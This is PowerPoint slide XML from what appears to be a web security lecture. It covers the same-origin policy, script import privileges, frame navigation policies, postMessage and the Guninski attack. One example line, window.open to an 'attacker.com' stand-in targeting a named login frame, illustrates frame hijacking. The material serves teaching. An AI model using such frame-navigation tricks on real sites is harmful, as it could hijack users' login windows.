          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Full access to same origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>Full network access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>Read/write DOM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>Storage</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/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Assumptions?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166916" name="AutoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5672138" y="4183063"/>
            <a:ext cx="2057400" cy="1724025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2403475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088" y="4416425"/>
            <a:ext cx="1143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6919" name="AutoShape 7"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="5891212" y="3486151"/>
            <a:ext cx="1668463" cy="366712"/>
          </a:xfrm>
          <a:prstGeom prst="leftRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 33361"/>
              <a:gd name="adj2" fmla="val 3762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3800" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6357938" y="2125663"/>
            <a:ext cx="7874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</a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33801" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5878513" y="5500688"/>
            <a:ext cx="1763712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22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22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166930" name="AutoShape 18"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3840163" y="5418138"/>
            <a:ext cx="1371600" cy="1147762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380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3" y="5486400"/>
            <a:ext cx="7604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804" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3898900" y="6211888"/>
            <a:ext cx="12827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3805" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4937125" y="4822825"/>
            <a:ext cx="1028700" cy="86995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360738"/>
            <a:ext cx="5032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Library import</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3481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Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=https://seal.verisign.com/getseal?host_name=a.com&gt;&lt;/script&gt;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Script has privileges of imported page, NOT source server.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Can script other pages in this origin, load more scripts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Other forms of importing</a:t>
            </a:r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</p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34820" name="Picture 4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73350"/>
            <a:ext cx="3759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0" y="3359150"/>
            <a:ext cx="1079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/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6838950" y="3522663"/>
            <a:ext cx="11461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sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>VeriSign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rot="10800000" flipH="1" flipV="1">
            <a:off x="5302250" y="3798888"/>
            <a:ext cx="1739900" cy="315912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50" y="3586163"/>
            <a:ext cx="8128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950" y="3852863"/>
            <a:ext cx="1041400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780088"/>
            <a:ext cx="1041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20" descr="flashjava"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7" cstate="print"/>
          <a:srcRect r="52881"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4773613" y="5780088"/>
            <a:ext cx="858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2" descr="flashjava"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7" cstate="print"/>
          <a:srcRect l="48813"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5740400" y="5867400"/>
            <a:ext cx="812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867400"/>
            <a:ext cx="7159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Components of browser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Frame-Frame relationships</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>canScript(A,B)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean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smtClean="0"/>
              <a:t>canNavigate(A,B)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Can Frame A change the origin of content for Frame B?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Frame-principal relationships</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>readCookie(A,S), writeCookie(A,S)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Can Frame A read/write cookies from site S?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Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>Domain Relaxation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36867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Origin: scheme, host, (port), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>hasSetDomain</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Try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endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166916" name="AutoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2895600" y="2743200"/>
            <a:ext cx="2819400" cy="1722438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5" y="1960563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325" y="2976563"/>
            <a:ext cx="1143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6919" name="AutoShape 7"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="3242714">
            <a:off x="2507456" y="2634457"/>
            <a:ext cx="1482725" cy="366712"/>
          </a:xfrm>
          <a:prstGeom prst="leftRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 33361"/>
              <a:gd name="adj2" fmla="val 37719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2" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="1581150"/>
            <a:ext cx="2497138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3" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3065463" y="4060825"/>
            <a:ext cx="2497137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166930" name="AutoShape 18"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="3471863"/>
            <a:ext cx="20574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6" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="698500" y="4306888"/>
            <a:ext cx="18161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V="1">
            <a:off x="2392363" y="3581400"/>
            <a:ext cx="1223962" cy="3048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AutoShape 18"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5867400" y="3405188"/>
            <a:ext cx="2286000" cy="1147762"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12093"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="F8DD6C"/>
              </a:gs>
              <a:gs pos="20000">
                <a:srgbClr val="F4DB6E"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="BBA753"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000"/>
          </a:gradFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="E9D57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9" name="Rectangle 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6032500" y="4229100"/>
            <a:ext cx="1939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pic>
        <p:nvPicPr>
          <p:cNvPr id="3688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4718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975" y="2073275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82" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5943600" y="1676400"/>
            <a:ext cx="24130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sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="AutoShape 7"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="65103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2" name="AutoShape 7"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="18621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4705350" y="3657600"/>
            <a:ext cx="1309688" cy="32702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665413" y="3459163"/>
            <a:ext cx="655637" cy="601662"/>
            <a:chOff x="5608626" y="1600199"/>
            <a:chExt cx="655015" cy="602082"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="36889" name="Straight Connector 34"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5608626" y="1600200"/>
              <a:ext cx="655014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90" name="Straight Connector 35"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="10800000" flipV="1">
              <a:off x="5608628" y="1600199"/>
              <a:ext cx="655013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6000" y="4210050"/>
            <a:ext cx="1792288" cy="36195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65463" y="4060825"/>
            <a:ext cx="2497137" cy="3619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8"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>Recent Developments</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:sym typeface="Helvetica Neue Light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49275" y="2079625"/>
            <a:ext cx="8069263" cy="402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network requests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&lt;list of domains&gt;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*</a:t>
            </a:r>
          </a:p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client side communication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Client-side messaging via navigation (older browsers)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 err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>postMessage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 (newer browsers)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167941" name="AutoShape 5"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5943600" y="1714500"/>
            <a:ext cx="1439863" cy="1165225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79425"/>
            <a:ext cx="936625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63" y="446088"/>
            <a:ext cx="938212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5" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8164513" y="157163"/>
            <a:ext cx="796925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B</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37896" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6380163" y="203200"/>
            <a:ext cx="7874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</a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167946" name="AutoShape 10"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7658100" y="1714500"/>
            <a:ext cx="13716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7827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9" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6011863" y="2606675"/>
            <a:ext cx="1284287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 flipV="1">
            <a:off x="6972300" y="822325"/>
            <a:ext cx="1096963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3790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38" y="17145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902" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7693025" y="2606675"/>
            <a:ext cx="1290638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B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 flipH="1" flipV="1">
            <a:off x="7178675" y="822325"/>
            <a:ext cx="1028700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 flipV="1">
            <a:off x="84121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 flipV="1">
            <a:off x="66976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 rot="10800000" flipV="1">
            <a:off x="7246938" y="2057400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rot="10800000" flipH="1" flipV="1">
            <a:off x="7246938" y="2332038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programming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Familiar with basic html?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Developed a web application using:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Apache?                  PHP?                Ruby?        </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL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JavaScript?               CSS?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ajax?                     JSON?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Resource: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http://www.w3schools.com/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window.postMessage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38915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New API for inter-frame communication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>Supported in latest betas of many browsers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ko-KR" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>A network-like channel between frames</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3891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0" descr="ie-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chrome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925" y="2819400"/>
            <a:ext cx="54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495800"/>
            <a:ext cx="1676400" cy="2003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38922" name="Right Arrow 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4343400" y="4953000"/>
            <a:ext cx="1905000" cy="768350"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 49989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Add a contact</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38923" name="Right Arrow 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="4343400" y="5773738"/>
            <a:ext cx="1828800" cy="704850"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 49946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Share contacts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38924" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1268413" y="4419600"/>
            <a:ext cx="6961187" cy="2286000"/>
          </a:xfrm>
          <a:prstGeom prst="rect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8925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445125"/>
            <a:ext cx="1752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990600" y="3200400"/>
            <a:ext cx="7772400" cy="160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990600" y="1920875"/>
            <a:ext cx="7772400" cy="838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postMessage syntax</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3994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en-US" sz="2000" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/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frames[0].postMessage("Attack at dawn!",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                  "http://b.com/");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" smtClean="0"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window.addEventListener("message", function (e)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if (e.origin == "http://a.com")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... e.data ... }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}, false);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="10-Point Star 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="6096000"/>
            <a:ext cx="762000" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="star10">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF9900"/>
          </a:solidFill>
          <a:ln>
            <a:noFill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Facebook</a:t>
            </a:r>
          </a:p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Anecdote</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39945" name="Picture 12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3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7" name="Straight Arrow Connector 14"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3505200" y="5751513"/>
            <a:ext cx="25146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3871913" y="5351463"/>
            <a:ext cx="199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Attack at dawn!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90600" y="2149475"/>
            <a:ext cx="6019800" cy="5175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include “targetOrigin”?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goes wrong?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900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	frames[0].postMessage("Attack at dawn!");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Messages sent to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>frames</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>, not principals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>When would this happen?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AD8062-BFDB-4E21-95A4-C8B019B16442}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 4" descr="reply-attac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eply-attack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Navigation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62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21E4E98-6C54-4011-A044-49C2C5501BA0}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/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Guninski Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41988" name="Picture 3" descr="ads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58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88000" y="4114800"/>
            <a:ext cx="2133600" cy="1536700"/>
            <a:chOff x="4656" y="1440"/>
            <a:chExt cx="864" cy="768"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="41994" name="Picture 7" descr="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" y="1440"/>
              <a:ext cx="86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Rectangle 8"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4663" y="1440"/>
              <a:ext cx="844" cy="768"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="57150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</p:grp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6057900" y="3748088"/>
            <a:ext cx="1187450" cy="366712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nsolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>awglogin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10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6000" y="41148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90600" y="5029200"/>
            <a:ext cx="5638800" cy="457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>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>window.open("https://attacker.com/", "awglogin");</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12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" y="51816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9" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="11" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="11" grpId="1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should the policy be?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6005A46-79CA-40A0-B97E-2AB30C506EA8}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB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86550" cy="50577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1219200" y="2103438"/>
            <a:ext cx="6537325" cy="4205287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5791200" y="2895600"/>
            <a:ext cx="1819275" cy="3200400"/>
          </a:xfrm>
          <a:prstGeom prst="rect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1362075" y="2895600"/>
            <a:ext cx="2133600" cy="3200400"/>
          </a:xfrm>
          <a:prstGeom prst="rect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514475" y="4648200"/>
            <a:ext cx="1828800" cy="12954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1866900" y="4457700"/>
            <a:ext cx="1447800" cy="1524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3200400" y="3657600"/>
            <a:ext cx="34290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2705100" y="3238500"/>
            <a:ext cx="2514600" cy="18288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2362200" y="3124200"/>
            <a:ext cx="26670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05000" y="4038600"/>
            <a:ext cx="74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32325" y="3562350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Sibling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9675" y="4324350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Descendant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0" y="38100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BA9921"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Frame Bust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8"/>
              </a:rPr>
              <a:t>Window Policy Anomaly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46083" name="Picture 4" descr="igoogle-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7197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2971800" y="2493963"/>
            <a:ext cx="5638800" cy="838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80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4825" y="2600325"/>
            <a:ext cx="5651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nsolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>top.frames[1].location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top.frames[2].location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... </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 4" descr="igoogle-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572452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 autoUpdateAnimBg="0"/>
      <p:bldP spid="47110" grpId="1" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="47111" grpId="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="47111" grpId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1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1000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(many policies)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5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3810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3297238"/>
            <a:ext cx="53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" y="4410075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70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" y="4876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0" name="Picture 130" descr="ie-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75" y="21812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65150" y="2713038"/>
            <a:ext cx="654050" cy="544512"/>
            <a:chOff x="356" y="1652"/>
            <a:chExt cx="412" cy="343"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="48163" name="Picture 71" descr="ie-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" y="165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4" name="Picture 20" descr="flashjava"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7" cstate="print"/>
            <a:srcRect r="52881"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="548" y="1755"/>
              <a:ext cx="2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62" name="Title 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Adoption of Descendant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lectures on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Browser security model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>The browser as an OS and execution platform</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Basic http: headers, cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Browser UI and security indicators</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Authentication and session management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>How users authenticate to web sites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
